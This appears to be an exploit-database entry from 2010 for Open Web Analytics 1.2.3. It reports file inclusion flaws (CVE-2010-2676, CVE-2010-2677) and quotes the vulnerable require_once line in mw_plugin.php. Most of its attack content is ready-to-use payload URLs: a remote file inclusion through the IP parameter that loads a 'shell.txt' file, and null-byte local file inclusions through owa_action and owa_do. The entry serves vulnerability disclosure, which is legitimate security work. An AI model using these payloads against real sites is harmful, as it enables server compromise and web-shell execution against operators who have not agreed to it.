[] NeoSense
E X P L O I T S
title author type platform port cve id

Open Web Analytics 1.2.3 - Multiple File Inclusions

Author: ITSecTeam
type: webapps
platform: php
port: 
date_added: 2010-03-26 
date_updated:  
verified: 1 
codes: OSVDB-66260;CVE-2010-2677;CVE-2010-2676;OSVDB-63288 
tags: 
aliases:  
screenshot_url:  
application_url: 
===========================================================================
( #Topic    : Open Web Analytics 1.2.3
( #Bug type : multi file include
( #Download : http://downloads.openwebanalytics.com/owa/owa_1_2_3.tar
( #Advisory :
===========================================================================
( #Author : ItSecTeam
( #Email  : Bug@ITSecTeam.com
( #Website: http://www.itsecteam.com
( #Forum  : http://forum.ITSecTeam.com
( #Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability26.htm
( #Special Tnx : ahmadbady , M3hr@n.S And All Team Members!

vuls:===================================================================
path/mw_plugin.php

require_once "$IP/includes/SpecialPage.php";

exploit:===================================================================

rfi : path/mw_plugin.php?IP=shell.txt?

lfi :path/index.php?owa_action=[lfi]%00
lfi :path/index.php?owa_do=[lfi]%00
--------------------------------------
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.